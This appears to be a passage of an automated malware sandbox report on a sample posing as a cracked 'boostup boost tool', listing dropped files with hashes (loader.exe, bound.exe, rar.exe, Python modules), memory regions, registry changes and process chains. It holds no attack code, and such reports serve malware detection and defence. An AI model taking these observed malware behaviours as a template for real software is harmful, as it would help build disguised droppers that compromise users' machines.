SHA1 4fae06f24a1b61e6594747ec934cbf06e7ec3773
SHA256 d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7
SHA512 c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

C:\Users\Admin\AppData\Local\Temp\_MEI18562\_decimal.pyd

MD5 e3fb8bf23d857b1eb860923ccc47baa5
SHA1 46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0
SHA256 7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3
SHA512 7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

C:\Users\Admin\AppData\Local\Temp\_MEI18562\_bz2.pyd

MD5 c413931b63def8c71374d7826fbf3ab4
SHA1 8b93087be080734db3399dc415cc5c875de857e2
SHA256 17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293
SHA512 7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

C:\Users\Admin\AppData\Local\Temp\_MEI18562\unicodedata.pyd

MD5 8c42fcc013a1820f82667188e77be22d
SHA1 fba7e4e0f86619aaf2868cedd72149e56a5a87d4
SHA256 0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2
SHA512 3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

C:\Users\Admin\AppData\Local\Temp\_MEI18562\sqlite3.dll

MD5 dbc64142944210671cca9d449dab62e6
SHA1 a2a2098b04b1205ba221244be43b88d90688334c
SHA256 6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c
SHA512 3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

C:\Users\Admin\AppData\Local\Temp\_MEI18562\select.pyd

MD5 45d5a749e3cd3c2de26a855b582373f6
SHA1 90bb8ac4495f239c07ec2090b935628a320b31fc
SHA256 2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876
SHA512 c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

C:\Users\Admin\AppData\Local\Temp\_MEI18562\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI18562\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI18562\libssl-3.dll

MD5 bf4a722ae2eae985bacc9d2117d90a6f
SHA1 3e29de32176d695d49c6b227ffd19b54abb521ef
SHA256 827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147
SHA512 dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

C:\Users\Admin\AppData\Local\Temp\_MEI18562\libcrypto-3.dll

MD5 78ebd9cb6709d939e4e0f2a6bbb80da9
SHA1 ea5d7307e781bc1fa0a2d098472e6ea639d87b73
SHA256 6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e
SHA512 b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

C:\Users\Admin\AppData\Local\Temp\_MEI18562\bound.blank

MD5 7705111a97e722d4bb4a0b91d8a6b55f
SHA1 474b52afdd55503fb2f3c2ca7c53824e8785ede8
SHA256 6c2330df293aaff501678a9783b4b8886368cb6011465b4256bfbed4c82ea224
SHA512 c096914345acc01859d0fb03d9c2f2f215d189ec6854987e349d434f80eeccfbd71fddaeef093deda560b48c1b0fedabdd560e1e1c80c4761a9557dddba343a4

memory/2064-56-0x00007FFD4FE10000-0x00007FFD4FE3D000-memory.dmp

memory/2064-58-0x00007FFD504B0000-0x00007FFD504C9000-memory.dmp

memory/2064-60-0x00007FFD4FDE0000-0x00007FFD4FE03000-memory.dmp

memory/2064-62-0x00007FFD40500000-0x00007FFD40677000-memory.dmp

memory/2064-66-0x00007FFD50BD0000-0x00007FFD50BDD000-memory.dmp

memory/2064-65-0x00007FFD4FDC0000-0x00007FFD4FDD9000-memory.dmp

memory/2064-71-0x00007FFD3FE20000-0x00007FFD40340000-memory.dmp

memory/2064-72-0x00007FFD3FD50000-0x00007FFD3FE1D000-memory.dmp

memory/2064-69-0x00007FFD4DFB0000-0x00007FFD4DFE3000-memory.dmp

memory/2064-77-0x00007FFD50160000-0x00007FFD5016D000-memory.dmp

memory/2064-76-0x00007FFD40870000-0x00007FFD40E59000-memory.dmp

memory/2064-75-0x00007FFD50940000-0x00007FFD50954000-memory.dmp

memory/2064-81-0x00007FFD40750000-0x00007FFD4086C000-memory.dmp

memory/2064-80-0x00007FFD50760000-0x00007FFD50783000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bound.exe

MD5 84aede3aa04bb514b90dcb124d948e1f
SHA1 8a0c6a152050a2f6cc0601b2a5c59f5f6c908c17
SHA256 3aeebdc59e7210fd533b8b3dfc8a8c45ca7c9c0f9507aa15924b025f2c3ef1da
SHA512 38c88dbbad0abb249d5ee362a2393bdc63f78a09497e2a012f473ceef59b45de00dddac74dc001cc04a03352baec13aeaffbc587e96bc05de24fa7647e84088a

memory/116-84-0x00007FF761F00000-0x00007FF762D09000-memory.dmp

memory/2872-90-0x000002B50FD00000-0x000002B50FD22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ehyre2gq.5oh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/116-116-0x00007FF761F00000-0x00007FF762D09000-memory.dmp

memory/116-115-0x00007FF761F00000-0x00007FF762D09000-memory.dmp

memory/116-117-0x00007FF761F00000-0x00007FF762D09000-memory.dmp

memory/116-119-0x00007FF761F00000-0x00007FF762D09000-memory.dmp

memory/116-118-0x00007FF761F00000-0x00007FF762D09000-memory.dmp

memory/116-120-0x00007FF761F00000-0x00007FF762D09000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe

MD5 5a796657b6f3717a1d30cd47d29f776a
SHA1 2d87d2b839845709d122d9464b77bb5c25d410f9
SHA256 c5236198f5fc86b31951528ee1f3f881746f8a03afe9c00628b27707871d9159
SHA512 29efda3f2c7e8e0aa406959e9b71b826c51e0dca66282320109cadb87f04ec2744a6e08cec8f87c2f2a5ea334c3a59d7eb697edd667ff0f49974f29a74fc908d

C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\python311.dll

MD5 9a24c8c35e4ac4b1597124c1dcbebe0f
SHA1 f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256 a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA512 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\vcruntime140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA512 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd

MD5 8140bdc5803a4893509f0e39b67158ce
SHA1 653cc1c82ba6240b0186623724aec3287e9bc232
SHA256 39715ef8d043354f0ab15f62878530a38518fb6192bc48da6a098498e8d35769
SHA512 d0878fee92e555b15e9f01ce39cfdc3d6122b41ce00ec3a4a7f0f661619f83ec520dca41e35a1e15650fb34ad238974fe8019577c42ca460dde76e3891b0e826

C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\python3.dll

MD5 34e49bb1dfddf6037f0001d9aefe7d61
SHA1 a25a39dca11cdc195c9ecd49e95657a3e4fe3215
SHA256 4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281
SHA512 edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd

MD5 6a9ca97c039d9bbb7abf40b53c851198
SHA1 01bcbd134a76ccd4f3badb5f4056abedcff60734
SHA256 e662d2b35bb48c5f3432bde79c0d20313238af800968ba0faa6ea7e7e5ef4535
SHA512 dedf7f98afc0a94a248f12e4c4ca01b412da45b926da3f9c4cbc1d2cbb98c8899f43f5884b1bf1f0b941edaeef65612ea17438e67745962ff13761300910960d

C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\libffi-8.dll

MD5 32d36d2b0719db2b739af803c5e1c2f5
SHA1 023c4f1159a2a05420f68daf939b9ac2b04ab082
SHA256 128a583e821e52b595eb4b3dda17697d3ca456ee72945f7ecce48ededad0e93c
SHA512 a0a68cfc2f96cb1afd29db185c940e9838b6d097d2591b0a2e66830dd500e8b9538d170125a00ee8c22b8251181b73518b73de94beeedd421d3e888564a111c1

C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\psutil\_psutil_windows.pyd

MD5 ebefbc98d468560b222f2d2d30ebb95c
SHA1 ee267e3a6e5bed1a15055451efcccac327d2bc43
SHA256 67c17558b635d6027ddbb781ea4e79fc0618bbec7485bd6d84b0ebcd9ef6a478
SHA512 ab9f949adfe9475b0ba8c37fa14b0705923f79c8a10b81446abc448ad38d5d55516f729b570d641926610c99df834223567c1efde166e6a0f805c9e2a35556e3

C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\select.pyd

MD5 97ee623f1217a7b4b7de5769b7b665d6
SHA1 95b918f3f4c057fb9c878c8cc5e502c0bd9e54c0
SHA256 0046eb32f873cde62cf29af02687b1dd43154e9fd10e0aa3d8353d3debb38790
SHA512 20edc7eae5c0709af5c792f04a8a633d416da5a38fc69bd0409afe40b7fb1afa526de6fe25d8543ece9ea44fd6baa04a9d316ac71212ae9638bdef768e661e0f

\??\c:\Users\Admin\AppData\Local\Temp\xgkvbgin\xgkvbgin.cmdline

MD5 6aeafdc059496d06e6faac6b12138bca
SHA1 b4d9560e7c2f7139a3e439ee7304f1b7e81ca778
SHA256 03d6e22c8a5e11b743ffc41a5b4c22adf20ca93cf4070a627576064691a06973
SHA512 4716afcfaedb49b0f6b82dde74418e72f05b7f8ca01bfaa86c607fa4c82a2368f5cef9852f7b393c4486a5aa9c12b1a7f02fded474f4c74403f38d8734b4d50c

\??\c:\Users\Admin\AppData\Local\Temp\xgkvbgin\xgkvbgin.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

memory/1768-278-0x000001DE24A60000-0x000001DE24A68000-memory.dmp

memory/2064-329-0x00007FFD50760000-0x00007FFD50783000-memory.dmp

memory/2064-343-0x00007FFD4FDE0000-0x00007FFD4FE03000-memory.dmp

memory/2064-339-0x00007FFD3FD50000-0x00007FFD3FE1D000-memory.dmp

memory/2064-338-0x00007FFD3FE20000-0x00007FFD40340000-memory.dmp

memory/2064-337-0x00007FFD4DFB0000-0x00007FFD4DFE3000-memory.dmp

memory/2064-335-0x00007FFD4FDC0000-0x00007FFD4FDD9000-memory.dmp

memory/2064-334-0x00007FFD40500000-0x00007FFD40677000-memory.dmp

memory/2064-328-0x00007FFD40870000-0x00007FFD40E59000-memory.dmp

memory/116-364-0x00007FF761F00000-0x00007FF762D09000-memory.dmp

memory/2064-365-0x00007FFD40870000-0x00007FFD40E59000-memory.dmp

memory/2064-379-0x00007FFD40750000-0x00007FFD4086C000-memory.dmp

memory/2064-384-0x00007FFD4FDE0000-0x00007FFD4FE03000-memory.dmp

memory/2064-383-0x00007FFD504B0000-0x00007FFD504C9000-memory.dmp

memory/2064-382-0x00007FFD4FE10000-0x00007FFD4FE3D000-memory.dmp

memory/2064-381-0x00007FFD54610000-0x00007FFD5461F000-memory.dmp

memory/2064-380-0x00007FFD50760000-0x00007FFD50783000-memory.dmp

memory/2064-378-0x00007FFD50160000-0x00007FFD5016D000-memory.dmp

memory/2064-377-0x00007FFD50940000-0x00007FFD50954000-memory.dmp

memory/2064-376-0x00007FFD3FD50000-0x00007FFD3FE1D000-memory.dmp

memory/2064-375-0x00007FFD3FE20000-0x00007FFD40340000-memory.dmp

memory/2064-374-0x00007FFD4DFB0000-0x00007FFD4DFE3000-memory.dmp

memory/2064-373-0x00007FFD50BD0000-0x00007FFD50BDD000-memory.dmp

memory/2064-372-0x00007FFD4FDC0000-0x00007FFD4FDD9000-memory.dmp

memory/2064-371-0x00007FFD40500000-0x00007FFD40677000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:22

Platform

win7-20240221-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win7-20240508-en

Max time kernel

120s

Max time network

121s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\config.yml

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\yml_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\yml_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\.yml C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\yml_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\yml_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\.yml\ = "yml_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\yml_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\yml_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\config.yml

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\config.yml

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\config.yml"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 8ccb86072348b3b358b06da1ac9b1386
SHA1 bd991a40d57e337500547c4669e0ee070aeddfd1
SHA256 66fd2861bb99cde3fc762d404f88b96a0a6d6817e8196879ac688f03e1a220d6
SHA512 f0facf1c4b8fdbe8d1ff6dc27723376bf7c9f053fd4b33b68026ac54a1ded4ab9a581002c7a3381f15e4d46c7fb2a9ce3e3c0562406ac780c30f7abfa24041f0